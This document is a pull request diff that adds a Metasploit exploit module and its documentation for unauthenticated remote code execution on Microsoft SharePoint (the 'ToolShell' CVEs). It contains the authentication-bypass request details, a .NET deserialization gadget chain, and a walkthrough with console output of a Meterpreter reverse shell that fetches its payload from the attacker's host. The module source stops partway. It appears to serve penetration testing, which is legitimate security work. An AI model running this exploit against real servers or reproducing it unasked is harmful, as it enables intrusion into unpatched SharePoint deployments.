### PR TITLE
Exploit module for Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
@@ -1,7 +1,10 @@
 ## Vulnerable Application
-This module exploits the authentication bypass vulnerability `CVE-2025-53771` (a patch bypass of `CVE-2025-49706`),
-and an unsafe deserialization vulnerability `CVE-2025-53770` (a patch bypass of `CVE-2025-49704`), to achieve
-unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
+This module exploits the authentication bypass vulnerabilities `CVE-2025-49706` and `CVE-2025-53771`, and an unsafe
+deserialization vulnerability `CVE-2025-49704`, to achieve unauthenticated RCE against a vulnerable Microsoft
+SharePoint Server. The vulnerability `CVE-2025-53770` was disclosed as being a patch bypass of `CVE-2025-49704`,
+and as described by the finders, `CVE-2025-53770` targets a different endpoint within the `/_vti_bin/` URI path.
+As this exploit module does not target the endpoint associated with `CVE-2025-53770` (per the original finders),
+we believe this module is best described as exploiting `CVE-2025-49704` alone (and not `CVE-2025-53770`).
 
 `CVE-2025-49706` is an authentication bypass affecting Microsoft SharePoint Server, allowing a remote unauthenticated
 attacker to reach the ToolPane page, located at the `/_layouts/15/ToolPane.aspx` URI. The auth bypass works if an
@@ -20,11 +23,11 @@ the ToolPane page.
 `LosFormatter` and `ObjectDataProvider` in the `diffgr:diffgram` XML document, allowing us to kick off a second
 stage deserialization gadget (which will be a `TypeConfuseDelegate` + `LosFormatter` gadget chain).
 
-`CVE-2025-53770` is a patch bypass of `CVE-2025-49704`. The patch for `CVE-2025-49704` did not apply correctly to a
-SharePoint site that had not also manually run a configuration upgrade. While the patch for `CVE-2025-49704` did not
-address the root cause, and instead marked the `Microsoft.PerformancePoint.Scorecards.Client` assembly as unsafe, the
-patch for `CVE-2025-53770` instead correctly addresses the root cause of `CVE-2025-49704` while also not relying
-on a manual configuration update to be performed.
+The July 8, 2025, patch for `CVE-2025-49704` did not apply correctly to a SharePoint site that had not also manually run
+a SharePoint configuration update. The patch for `CVE-2025-49704` did not address the root cause, and instead marked the
+`Microsoft.PerformancePoint.Scorecards.Client` assembly as unsafe. The July 19, 2025, patch for `CVE-2025-53770`
+addresses the root cause of `CVE-2025-49704` and does not rely on a manual configuration update to be performed in
+order to be affective.
 
 ## Testing
 This exploit module has been successfully tested against the following versions:

--- a/documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_toolpane_rce.md
@@ -1,0 +1,188 @@
+## Vulnerable Application
+This module exploits the authentication bypass vulnerability `CVE-2025-53771` (a patch bypass of `CVE-2025-49706`),
+and an unsafe deserialization vulnerability `CVE-2025-53770` (a patch bypass of `CVE-2025-49704`), to achieve
+unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
+
+`CVE-2025-49706` is an authentication bypass affecting Microsoft SharePoint Server, allowing a remote unauthenticated
+attacker to reach the ToolPane page, located at the `/_layouts/15/ToolPane.aspx` URI. The auth bypass works if an
+attacker supplies the following elements to an HTTP request:
+
+* An HTTP Referer header with one of the values `/_layouts/SignOut.aspx`, `/_layouts/14/SignOut.aspx`, or `/_layouts/15/SignOut.aspx`.
+* An HTTP query parameter named `DisplayMode` with the value `Edit`.
+* An HTTP query parameter with any name and the value `/ToolPane.aspx`, so long as this is the last query parameter.
+* An HTTP form parameter named `MSOTlPn_Uri` with the full URL to the `/_controltemplates/15/AclEditor.ascx` endpoint.
+
+`CVE-2025-53771` is a patch bypass for `CVE-2025-49706`. By appending a trailing `/` to the target
+`/_layouts/15/ToolPane.aspx` URI, e.g. `/_layouts/15/ToolPane.aspx/` a remote unauthenticated attacker can reach
+the ToolPane page.
+
+`CVE-2025-49704` is an unsafe deserialization vulnerability due to bypassing a filter list to allow the instantiation of
+`LosFormatter` and `ObjectDataProvider` in the `diffgr:diffgram` XML document, allowing us to kick off a second
+stage deserialization gadget (which will be a `TypeConfuseDelegate` + `LosFormatter` gadget chain).
+
+`CVE-2025-53770` is a patch bypass of `CVE-2025-49704`. The patch for `CVE-2025-49704` did not apply correctly to a
+SharePoint site that had not also manually run a configuration upgrade. While the patch for `CVE-2025-49704` did not
+address the root cause, and instead marked the `Microsoft.PerformancePoint.Scorecards.Client` assembly as unsafe, the
+patch for `CVE-2025-53770` instead correctly addresses the root cause of `CVE-2025-49704` while also not relying
+on a manual configuration update to be performed.
+
+## Testing
+This exploit module has been successfully tested against the following versions:
+
+* SharePoint Server 2019 `16.0.10337.12109` - This is the RTM version. Is vulnerable to all 4 CVEs. Exploitation
+is reliable.
+* SharePoint Server 2019 `16.0.10417.20018` - This is the June 2025 patch level (`KB 5002729)`. Is vulnerable to
+all 4 CVEs. Exploitation is reliable.
+* SharePoint Server 2019 `16.0.10417.20027` - This is the July 2025 patch level (`KB 5002741`). This patched
+out `CVE-2025-49704` and `CVE-2025-49706`, but is vulnerable to `CVE-2025-53770` and `CVE-2025-53771`. Exploitation is
+reliable **unless the site administrator has manually performed a configuration update**.
+
+### Setup
+
+Installing Microsoft SharePoint is non-trivial. This [setup guide](https://gist.github.com/testanull/e1573437f91ec3726ab5041389c6f28d)
+is a great step-by-step tutorial to get up and running.
+
+After you install SharePoint, you must create a new site, bound to a new port. This is what the exploit will target.
+
+_NOTE: If you enable HTTPS, you will need to manually setup certificates via IIS Manager._
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/windows/http/sharepoint_toolpane_rce`
+
+Configure the target:
+
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_HTTP_OR_HTTPS_PORT>`
+5. `set SSL true` (If targeting HTTPS)
+
+Configure the payload:
+
+_NOTE: If testing with the default Meterpreter payloads, you will likely need to disable Defender._
+
+6. `set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcp`
+7. `set LHOST eth0`
+8. `set LPORT 4444`
+
+Run the exploit:
+
+9. `check`
+10. `exploit`
+
+## Scenarios
+
+### Example 1 (cmd/windows/http/x64/meterpreter_reverse_tcp)
+
+```
+msf exploit(windows/http/sharepoint_toolpane_rce) > show options 
+
+Module options (exploit/windows/http/sharepoint_toolpane_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      ccMNrNsj         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.86.122   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(windows/http/sharepoint_toolpane_rce) > check
+[*] 192.168.86.50:80 - The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+msf exploit(windows/http/sharepoint_toolpane_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+[*] Meterpreter session 3 opened (192.168.86.122:4444 -> 192.168.86.50:62290) at 2025-07-23 12:58:41 +0100
+
+meterpreter > sysinfo
+Computer        : WIN-V28QNSO2H05
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : TESTDOMAIN
+Logged On Users : 24
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > 
+```
+
+### Example 2 (cmd/windows/generic)
+
+```
+msf exploit(windows/http/sharepoint_toolpane_rce) > show options 
+
+Module options (exploit/windows/http/sharepoint_toolpane_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
+   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/windows/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+   CMD   notepad.exe      yes       The command string to execute
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(windows/http/sharepoint_toolpane_rce) > exploit
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected Microsoft SharePoint Server 2019 version 16.0.10417.20027
+[*] Exploit completed, but no session was created.
+msf exploit(windows/http/sharepoint_toolpane_rce) >
+```
+
+You will be able to observe in Task Manager or Process Explorer that the `w3wp.exe` process has spawned `cmd.exe` which
+has spawned `notepad.exe`.

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # The returned HTML will have a blob of JavaScript that contains a hash object called _spPageContextInfo. A key
     # called siteClientTag will have a value of the current SharePoint Server patch level. We cannot rely on the HTTP
     # header value MicrosoftSharePointTeamServices as this may not reflect the actual patch level.
-    site_client_tag = res.body.match(/"siteClientTag"\s*:\s*"\d*[$]+([^"]+)",/)
+    site_client_tag = res.body.match(/"*siteClientTag"*\s*:\s*"\d*[$]+([^"]+)",/)
 
     return CheckCode::Unknown('Unable to extract the siteClientTag') unless site_client_tag
 

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -166,6 +166,9 @@ class MetasploitModule < Msf::Exploit::Remote
       name_b = Rex::Text.rand_text_alpha_lower(8..16)
       name_c = Rex::Text.rand_text_alpha_lower(8..16)
 
+      # The msdata:DataType attribute below is CVE-2025-49704, and allows bypassing a filter list so we can instantiate
+      # LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document below, allowing us to kcik off a second
+      # stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
       schema = <<~EOF
         <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="#{name_a}">
           <xs:element name="#{name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -15,42 +15,49 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)',
         'Description' => %q{
-          This module exploits the authentication bypass vulnerability CVE-2025-53771 (a patch bypass of CVE-2025-49706),
-          and an unsafe deserialization vulnerability CVE-2025-53770 (a patch bypass of CVE-2025-49704), to achieve
-          unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
+          This module exploits the authentication bypass vulnerabilities CVE-2025-49706 and CVE-2025-53771, and an unsafe
+          deserialization vulnerability CVE-2025-49704, to achieve unauthenticated RCE against a vulnerable Microsoft
+          SharePoint Server. The vulnerability CVE-2025-53770 was disclosed as being a patch bypass of CVE-2025-49704,
+          and as described by the finders, CVE-2025-53770 targets a different endpoint within the /_vti_bin/ URI path.
+          As this exploit module does not target the endpoint associated with CVE-2025-53770 (per the original finders),
+          we believe this module is best described as exploiting CVE-2025-49704 and not CVE-2025-53770.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           # Discovered CVE-2025-49704 and CVE-2025-49706, demoed at Pwn2Own Berlin 2025.
+          # Credited by Microsoft as also discovering CVE-2025-53770 and CVE-2025-53771.
           'Viettel Cyber Security',
-          # Metasploit module, based on the public PoC of the zero-day exploit for CVE-2025-53770 and CVE-2025-53771.
+          # Metasploit module, based on the public PoC of the exploit for CVE-2025-49706 and CVE-2025-49704.
           'sfewer-r7'
-          # NOTE: The author attribution for CVE-2025-53770 and CVE-2025-53771 is unclear.
         ],
         'References' => [
           # Microsoft SharePoint DataSetSurrogateSelector Deserialization of Untrusted Data Remote Code Execution Vulnerability.
           ['CVE', '2025-49704'],
           # Microsoft SharePoint ToolPane Authentication Bypass Vulnerability.
           ['CVE', '2025-49706'],
-          # Patch bypass for CVE-2025-49704, exploited in-the-wild as a zero-day.
+          # Patch bypass for CVE-2025-49704, by targeting a different endpoint within the /_vti_bin/ path.
           ['CVE', '2025-53770'],
-          # Patch bypass for CVE-2025-49706, exploited in-the-wild as a zero-day.
+          # Patch bypass for CVE-2025-49706.
           ['CVE', '2025-53771'],
           # Technical analysis of CVE-2025-49704 and CVE-2025-49706 by the original finder, Dinh Ho Anh Khoa (Viettel Cyber Security).
           ['URL', 'https://blog.viettelcybersecurity.com/sharepoint-toolshell/'],
-          # LeakIX blog which captured the malicious request for the in-the-wild exploit.
+          # LeakIX blog which captured the malicious request for the in-the-wild exploit for CVE-2025-49706, CVE-2025-53771, and CVE-2025-49704.
           ['URL', 'https://blog.leakix.net/2025/07/using-their-own-weapons-for-defense-a-sharepoint-story/'],
           # Technical analysis of CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771 by Kaspersky.
           ['URL', 'https://securelist.com/toolshell-explained/'],
           # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],
-          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771, caught in-the-wild.
+          # Microsoft advisories for CVE-2025-49704 and CVE-2025-49706.
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49706'],
+          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771.
           ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770'],
           ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771'],
           # Microsoft Guidance.
+          ['URL', 'https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/'],
           ['URL', 'https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/'],
-          # The zero-day exploit for CVE-2025-53770 and CVE-2025-53771, published July 21, 2025.
+          # The zero-day exploit for CVE-2025-49704, CVE-2025-49706, published July 21, 2025.
           ['URL', 'https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501'],
           # Markus Wulftange (CODE WHITE GmbH) reproduced CVE-2025-49704 and CVE-2025-49706, circa July 14, 2025.
           ['URL', 'https://x.com/codewhitesec/status/1944743478350557232'],
@@ -59,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
           # Prior work from Steven Seeley on a similar DataSet gadget chain for SharePoint.
           ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
         ],
-        'DisclosureDate' => '2025-07-19', # Disclosure date for CVE-2025-53770 and CVE-2025-53771.
+        'DisclosureDate' => '2025-07-08', # Disclosure date for CVE-2025-49704 and CVE-2025-49706.
         'Platform' => ['win'],
         'Arch' => [ARCH_CMD],
         'Privileged' => false, # Executes as the SharePoint site user.
@@ -112,6 +119,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # compare the target version against the RTM version (i.e. the first version of an edition) and the version *before*
     # the patch for CVE-2025-53770 and CVE-2025-53771 (which supersedes patches for CVE-2025-49704 and CVE-2025-49706
     # from July 2025).
+    # Note: A SharePoint server that has the patch for CVE-2025-49704 applied, may still be vulnerable if a SharePoint
+    # configuration update has not also manually occurred.
     # https://learn.microsoft.com/en-us/sharepoint/product-servicing-policy/updated-product-servicing-policy-for-sharepoint-2019
     # https://learn.microsoft.com/en-us/officeupdates/sharepoint-updates
 

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'error.aspx')
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'start.aspx')
     )
 
     return CheckCode::Unknown('Connection failed') unless res

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -36,6 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-53770'],
           # Patch bypass for CVE-2025-49706, exploited in-the-wild as a zero-day.
           ['CVE', '2025-53771'],
+          # Technical analysis of CVE-2025-49704 and CVE-2025-49706 by the original finder, Dinh Ho Anh Khoa (Viettel Cyber Security).
+          ['URL', 'https://blog.viettelcybersecurity.com/sharepoint-toolshell/'],
           # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -299,14 +299,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => {
-        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
+        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx') # This is part of CVE-2025-49706
       },
       'vars_get' => {
-        'DisplayMode' => 'Edit',
-        'a' => '/ToolPane.aspx'
+        'DisplayMode' => 'Edit', # This is part of CVE-2025-49706
+        Rex::Text.rand_text_alpha_lower(8..16) => '/ToolPane.aspx' # This is part of CVE-2025-49706
       },
       'vars_post' => {
-        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
+        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')), # This is part of CVE-2025-49706
         'MSOTlPn_DWP' => xml
       }
     )

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -40,6 +40,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://blog.viettelcybersecurity.com/sharepoint-toolshell/'],
           # LeakIX blog which captured the malicious request for the in-the-wild exploit.
           ['URL', 'https://blog.leakix.net/2025/07/using-their-own-weapons-for-defense-a-sharepoint-story/'],
+          # Technical analysis of CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771 by Kaspersky.
+          ['URL', 'https://securelist.com/toolshell-explained/'],
           # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -299,7 +299,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
+      'uri' => normalize_uri(
+        target_uri.path,
+        '_layouts',
+        '15',
+        'ToolPane.aspx',
+        Rex::Text.rand_text_alpha_lower(8..16) # The addition of a trailing path segment appears to be CVE-2025-53771
+      ),
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => {
         'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx') # This is part of CVE-2025-49706

--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -1,0 +1,239 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SharePoint Server ToolPane Unauthenticated Remote Code Execution (aka ToolShell)',
+        'Description' => %q{
+          This module exploits the authentication bypass vulnerability CVE-2025-53771 (a patch bypass of CVE-2025-49706),
+          and an unsafe deserialization vulnerability CVE-2025-53770 (a patch bypass of CVE-2025-49704), to achieve
+          unauthenticated RCE against a vulnerable Microsoft SharePoint Server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          # Discovered CVE-2025-49704 and CVE-2025-49706, demoed at Pwn2Own Berlin 2025.
+          'Viettel Cyber Security',
+          # Metasploit module, based on the public PoC of the zero-day exploit for CVE-2025-53770 and CVE-2025-53771.
+          'sfewer-r7'
+          # NOTE: The author attribution for CVE-2025-53770 and CVE-2025-53771 is unclear.
+        ],
+        'References' => [
+          # Microsoft SharePoint DataSetSurrogateSelector Deserialization of Untrusted Data Remote Code Execution Vulnerability.
+          ['CVE', '2025-49704'],
+          # Microsoft SharePoint ToolPane Authentication Bypass Vulnerability.
+          ['CVE', '2025-49706'],
+          # Patch bypass for CVE-2025-49704, exploited in-the-wild as a zero-day.
+          ['CVE', '2025-53770'],
+          # Patch bypass for CVE-2025-49706, exploited in-the-wild as a zero-day.
+          ['CVE', '2025-53771'],
+          # ZDI advisories for CVE-2025-49704 and CVE-2025-49706, discovered by Viettel Cyber Security.
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-580/'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-581/'],
+          # Microsoft advisories for CVE-2025-53770 and CVE-2025-53771, caught in-the-wild.
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771'],
+          # Microsoft Guidance.
+          ['URL', 'https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/'],
+          # The zero-day exploit for CVE-2025-53770 and CVE-2025-53771, published July 21, 2025.
+          ['URL', 'https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501'],
+          # Markus Wulftange (CODE WHITE GmbH) reproduced CVE-2025-49704 and CVE-2025-49706, circa July 14, 2025.
+          ['URL', 'https://x.com/codewhitesec/status/1944743478350557232'],
+          # Dinh Ho Anh Khoa (Viettel Cyber Security) demoed CVE-2025-49704 and CVE-2025-49706 at Pwn2Own Berlin on May 16, 2025.
+          ['URL', 'https://x.com/thezdi/status/1923317597673533552'],
+          # Prior work from Steven Seeley on a similar DataSet gadget chain for SharePoint.
+          ['URL', 'https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html']
+        ],
+        'DisclosureDate' => '2025-07-19', # Disclosure date for CVE-2025-53770 and CVE-2025-53771.
+        'Platform' => ['win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false, # Executes as the SharePoint site user.
+        'Targets' => [
+          [
+            'Default', {}
+          ]
+        ],
+        # NOTE: Tested with the following payloads:
+        #   cmd/windows/http/x64/meterpreter/reverse_tcp
+        #   cmd/windows/generic
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          # Delete the fetch binary after execution.
+          'FETCH_DELETE' => true,
+          # The root path of the SharePoint site
+          'URIPATH' => '/'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'error.aspx')
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown("Unexpected response code #{res.code}") unless res.code == 200
+
+    # The returned HTML will have a blob of JavaScript that contains a hash object called _spPageContextInfo. A key
+    # called siteClientTag will have a value of the current SharePoint Server patch level. We cannot rely on the HTTP
+    # header value MicrosoftSharePointTeamServices as this may not reflect the actual patch level.
+    site_client_tag = res.body.match(/"siteClientTag"\s*:\s*"\d*[$]+([^"]+)",/)
+
+    return CheckCode::Unknown('Unable to extract the siteClientTag') unless site_client_tag
+
+    version = Rex::Version.new(site_client_tag[1])
+
+    # We compare the version we pull from the target, against a table of known vulnerable SharePoint editions. We
+    # compare the target version against the RTM version (i.e. the first version of an edition) and the version *before*
+    # the patch for CVE-2025-53770 and CVE-2025-53771 (which supersedes patches for CVE-2025-49704 and CVE-2025-49706
+    # from July 2025).
+    # https://learn.microsoft.com/en-us/sharepoint/product-servicing-policy/updated-product-servicing-policy-for-sharepoint-2019
+    # https://learn.microsoft.com/en-us/officeupdates/sharepoint-updates
+
+    ranges = [
+      [
+        'Microsoft SharePoint Server Subscription Edition',
+        '16.0.14326.20450', # The RTM version (circa 2021)
+        '16.0.18526.20424' # July 2025
+      ],
+      [
+        'Microsoft SharePoint Server 2019',
+        '16.0.10337.12109', # The RTM version (circa 2019)
+        '16.0.10417.20027' # July 2025
+      ],
+      [
+        'Microsoft SharePoint Enterprise Server 2016',
+        '16.0.4351.1000', # The RTM version (circa 2017)
+        '16.0.5508.1000' # July 2025
+      ],
+      # NOTE: It is unclear if older unsupported versions (SharePoint Server 2013 and 2010) are vulnerable.
+      [
+        'SharePoint Server 2013',
+        '15.0.4481.1005',
+        '15.0.5545.1000' # Last version before end of support.
+      ],
+      [
+        'SharePoint Server 2010',
+        '14.0.7015.1000',
+        '14.0.7268.5000' # Last version before end of support.
+      ]
+    ]
+
+    ranges.each do |product, rtm_version, patch_version|
+      if version.between?(Rex::Version.new(rtm_version), Rex::Version.new(patch_version))
+        return Exploit::CheckCode::Appears("Detected #{product} version #{version}")
+      end
+    end
+
+    # If we get here, it's a patched version.
+    Exploit::CheckCode::Safe("Detected Microsoft SharePoint Server version #{version}")
+  end
+
+  def exploit
+    gadget_raw = create_gadget_chain
+    send_exploit(gadget_raw)
+  end
+
+  def create_gadget_chain
+    # NOTE: Depending on the version of SharePoint, different gadgets can be used.
+    #
+    # * A TypeConfuseDelegate + BinaryFormatter gadget chain was tested against Microsoft SharePoint Server 2019 version
+    # 16.0.10337.12109 (RTM circa 2019), but does not work on more recent versions like 16.0.10417.20018 (June 2025).
+    #
+    # * The XmlSchema DataSet chain which then wraps the TypeConfuseDelegate + LosFormatter gadget chain was tested to
+    # work against Microsoft SharePoint Server 2019 versions 16.0.10337.12109 (RTM circa 2019), 16.0.10417.20018
+    # (June 2025), and 16.0.10417.20027 (July 2025). This is the chain as caught in-the-wild circa July 19, 2025.
+
+    typeconfusedelegate_gadget_raw = ::Msf::Util::DotNetDeserialization.generate(
+      payload.encoded,
+      gadget_chain: :TypeConfuseDelegate,
+      formatter: :LosFormatter
+    )
+
+    vprint_status('Using TypeConfuseDelegate + LosFormatter gadget chain:')
+    vprint_line(Rex::Text.to_hex_dump(typeconfusedelegate_gadget_raw))
+
+    typeconfusedelegate_gadget_b64 = Base64.strict_encode64(typeconfusedelegate_gadget_raw)
+
+    # This gadget chain was pulled from the PoC posted here (https://gist.github.com/gboddin/6374c04f84b58cef050f5f4ecf43d501)
+    # and is thought to be from the zero-day exploit caught in-the-wild. The payload from the in-the-wild gadget has
+    # been removed and replaced with a string value "HAX".
+    #
+    # TO-DO: get rid of this base64 blob, and construct the gadget using the Msf::Util::DotNetDeserializatio helper routines.
